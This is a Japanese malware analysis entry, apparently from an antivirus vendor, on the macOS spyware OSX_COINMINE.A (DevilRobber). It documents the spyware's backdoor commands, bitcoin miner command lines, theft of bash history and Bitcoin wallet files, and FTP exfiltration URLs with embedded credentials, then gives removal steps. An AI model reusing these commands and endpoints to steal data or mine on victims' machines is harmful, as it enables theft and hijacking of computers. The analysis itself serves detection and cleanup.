解析者: Christopher Daniel So   
 別名:

Backdoor:MacOS_X/DevilRobber.A (Microsoft)

 プラットフォーム:

Mac OS X

 危険度:
 感染確認数:
 システムへの影響:
 情報漏えい:

  • マルウェアタイプ:
    スパイウェア

  • 破壊活動の有無:
    なし

  • 暗号化:
    はい

  • 感染報告の有無 :
    はい

  概要

スパイウェアは、特定のコマンドを利用し、「Bitcoin miner(ビットコインマイナー)」のプログラムを実行します。ビットコインマイナーは、仮想通貨「Bitcoin(ビットコイン)」を生成するという「Bitcoinマイニング」ために利用されるソフトウェアです。スパイウェアは、コマンドラインパラメータを利用し、「JAVA_COINMINE.A」として検出されるファイル "DiabloMiner.jar" を実行します。スパイウェアは、特定の情報を含むテキストファイル "dump.txt" を作成します。そしてスパイウェアは、コマンドを利用し、テキストファイル "dump.txt" を "<ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip" として圧縮します。さらに、スパイウェアは、圧縮したファイル "<ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip" をFTPサーバへアップロードします。

スパイウェアは、他のマルウェアのパッケージとともにコンポーネントとしてコンピュータに侵入します。 スパイウェアは、リモートサイトから他のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。

スパイウェアは、不正リモートユーザからのコマンドを実行し、感染コンピュータを改ざんします。

  詳細

ファイルサイズ 不定
タイプ Mach-O, Script
メモリ常駐 はい
発見日 2011年11月2日
ペイロード ファイルの作成

侵入方法

スパイウェアは、他のマルウェアのパッケージとともにコンポーネントとしてコンピュータに侵入します。

スパイウェアは、リモートサイトから以下のマルウェアまたはグレイウェアにダウンロードされ、コンピュータに侵入します。

  • TROJ_COINMINE.A

バックドア活動

スパイウェアは、以下のポートを開き、リモートコマンドを待機します。

  • TCP port 34123

スパイウェアは、不正リモートユーザからの以下のコマンドを実行します。

  • 1 - execute a command and return the result to the remote client
  • 2 - take a screenshot by running the command screencapture -T 0 -x 1.png, uuencode the file 1.png to s.txt, send s.txt to the remote client, and delete 1.png and s.txt after sending
  • any other command - close the connection

スパイウェアが、実行するコマンドは、以下のとおりです。

  • 1 - コマンドを実行し、その結果を不正リモートユーザに返信する。
  • 2 - コマンド「screencapture -T 0 -x 1.png」を利用し、スクリーンショットを取得する。そして、取得したスクリーンショット "1.png" を「uuencodeコマンド」によりテキストファイル "s.txt" に変換し、不正リモートユーザへ送信する。送信後、"1.png" および "s.txt" を削除する。
  • その他のコマンド - 不正リモートユーザへの接続を解除する。

スパイウェアは、以下のコマンドを利用し、ビットコインマイナーのプログラムを実行します。

  • ./minerd --url http://su.mining.eligius.st:8337 --userpass <ビットコインのホストユーザ名>:123 --algo cryptopp_asm32

スパイウェアは、以下のコマンドラインパラメータを利用し、「JAVA_COINMINE.A」として検出されるファイル "DiabloMiner.jar" を実行します。

  • -u <ビットコインのホストユーザ名> -p 123 -o su.mining.eligius.st -r 8337 -v 2 -f 20

上記の<ビットコインのホストユーザ名>には、以下のいずれかが用いられます。

  • 16i22nMinPcWf5UUSVNWBosZbQ65DsfiAX
  • 15DzENUPvq3TSsnr4QgMFY8L8mih1MRpi1
  • 1FNnnNMDoPQA2PwHJaK3cZZSTcWq42GRTh

スパイウェアは、以下の情報を含むテキストファイル "dump.txt" を作成します。

  • ファイル名に「truecrypt」を含むファイルの数
  • ファイル名に「pthc」を含むファイルの数
  • ファイル名に「vidalia」を含むファイルの数
  • ファイル "/Users/<ユーザ名>/.bash_history" が含むすべてのコンテンツ
  • ファイル "/Users/<ユーザ名>/Library/Application Support/Bitcoin/wallet.dat" が存在する場合、このファイルが含むすべてのコンテンツ

スパイウェアは、以下のコマンドを利用し、テキストファイル "dump.txt" を "<ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip" として圧縮します。

  • zip -r -X <ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip dump.txt

スパイウェアは、圧縮したファイル "<ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip" を以下のFTPサーバへアップロードします。

  • ftp://bubba47:semiram237@ftp.drivehq.com/<ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip
  • ftp://acab73:boss583@ftp.drivehq.com/<ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip
  • ftp://manamar489:most832@ftp.drivehq.com/<ランダムな16進法値>_<ランダムな16進法値>_<ランダムな16進法値>.zip

スパイウェアは、以下のファイルを作成します。このファイルは、このスパイウェアの現在の環境設定情報を含みます。

  • status.cfg

  対応方法

対応検索エンジン: 9.200
初回 VSAPI パターンバージョン 8.560.05
初回 VSAPI パターンリリース日 2011年11月9日
VSAPI OPR パターンバージョン 8.561.00
VSAPI OPR パターンリリース日 2011年11月10日

手順 1

「OSX_COINMINE.A」 を作成またはダウンロードする不正なファイルを削除します。(註:以下のマルウェアもしくはアドウェア等がすでに削除されている場合は、本手順は行う必要はありません。)

手順 2

この「OSX_COINMINE.A」が作成、あるいは、ダウンロードした以下のファイルを検索し、検索した場合は削除してください。(註:以下のマルウェアもしくはアドウェア等がすでに削除されている場合は、本手順は行う必要はありません。)

手順 3

コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「OSX_COINMINE.A」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。


ご利用はいかがでしたか? アンケートにご協力ください

関連マルウェア